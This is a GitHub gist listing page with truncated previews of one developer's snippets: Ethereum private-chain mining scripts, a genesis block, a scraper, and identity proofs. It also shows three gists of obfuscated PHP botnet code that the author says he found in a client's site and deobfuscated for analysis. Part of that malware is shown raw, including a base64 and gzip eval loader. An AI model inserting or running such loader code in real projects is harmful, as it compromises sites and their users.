Skip to content

Instantly share code, notes, and snippets.

Ryan ryepdx

Block or report user

Report or block ryepdx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View cryptofresh_scraper.js
'use strict'
var scrap = require('scrap')
scrap('http://cryptofresh.com/u/maker-fund', function (err, $) {
if (err) {
console.error(err)
return
}
$('#body div.col-sm-8 span.action').each(function (i, row) {
@ryepdx
ryepdx / config.js
Created Feb 28, 2016
An optional configuration file to go with mine.js
View config.js
config = {
interval_ms: 15000,
mine_pending_txns: true,
mine_periodically: true,
mine_normally: false
};
@ryepdx
ryepdx / mine.js
Created Feb 28, 2016
A script to make geth mine at a slower rate. Useful for development on private chains.
View mine.js
// Adapted from Iuri Matias' Embark framework
// https://github.com/iurimatias/embark-framework
// Modified by ryepdx to mine at regular intervals.
(function() {
var main = function () {
if (!loadScript("config.js")) {
console.log("== config.js not found");
}
if (typeof(config) === "undefined") {
@ryepdx
ryepdx / zero_genesis.json
Created Aug 7, 2015
A genesis block with no difficulty
View zero_genesis.json
{
"nonce": "0xdeadbeefdeadbeef",
"timestamp": "0x0",
"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"extraData": "0x686f727365",
"gasLimit": "0x8000000",
"difficulty": "0x0",
"mixhash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"coinbase": "0x3333333333333333333333333333333333333333",
"alloc": {
@ryepdx
ryepdx / mine.js
Last active Feb 10, 2018
Turn the Ethereum miner on and off intelligently to save your CPU when mining on a private chain.
View mine.js
// Adapted from Iuri Matias' Embark framework
// https://github.com/iurimatias/embark-framework
// Modified by ryepdx to mine at regular intervals.
(function() {
var main = function () {
if (!loadScript("config.js")) {
console.log("== config.js not found");
}
if (typeof(config) === "undefined") {
View gist:ee47a7db8e84a6d75df7
Verifying that +ryepdx is my openname (Bitcoin username). https://onename.io/ryepdx
@ryepdx
ryepdx / keybase.md
Created Aug 7, 2014
Keybase verification
View keybase.md

Keybase proof

I hereby claim:

  • I am ryepdx on github.
  • I am ryepdx (https://keybase.io/ryepdx) on keybase.
  • I have a public key whose fingerprint is C901 BFF6 45AF 5CD0 6F58 D724 680F 5108 B06D BB77

To claim this, I am signing this object:

@ryepdx
ryepdx / infection_one_layer_down.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. This is the code the first obfuscated layer was executing. (Whitespace added for your convenience.) http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_one_layer_down.php
<?php
/*versio:2.18*/
$III1=0;
if (!function_exists('IlI11lll')){
$GLOBALS['III1'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZ
@ryepdx
ryepdx / infection_raw.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_raw.php
<?php
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$L3BnLnBocD91PQJms9JnQ9cGhwJnA9JnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlY0MXZvbGdRLzFkZVRkTkE0bklnNHNmMXVHaTY5a3JTazJwMWswM1hFRmVmTFZrRUEzamRwdkYvdjVsNUQzaFcycjJyVGNRMzgrWjdmak9FRzZhZHJma21qUGxhYTZ4NXp0TnRHQy96SkczbytpdmI3T05WSGlZeFV5bkJoaWNiN2R5eklpdnl
@ryepdx
ryepdx / infection_exposed_and_explained.php
Last active Feb 21, 2016
After de-obfuscating and commenting the botnet slave code I found in a client's codebase, this is what I ended up with. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_exposed_and_explained.php
<?php
// "!defined('determinator') == "include_once" for sneaky people.
if (!defined("determinator")){
function determinator_feof($file_pointer, &$now = NULL) {
// Assigning a value to $now in this function changes
// the value of whatever variable the calling function
// passed in. Functions with side effects... huzzah!
$now = microtime(true);
// Have we reached the end of the file?
You can’t perform that action at this time.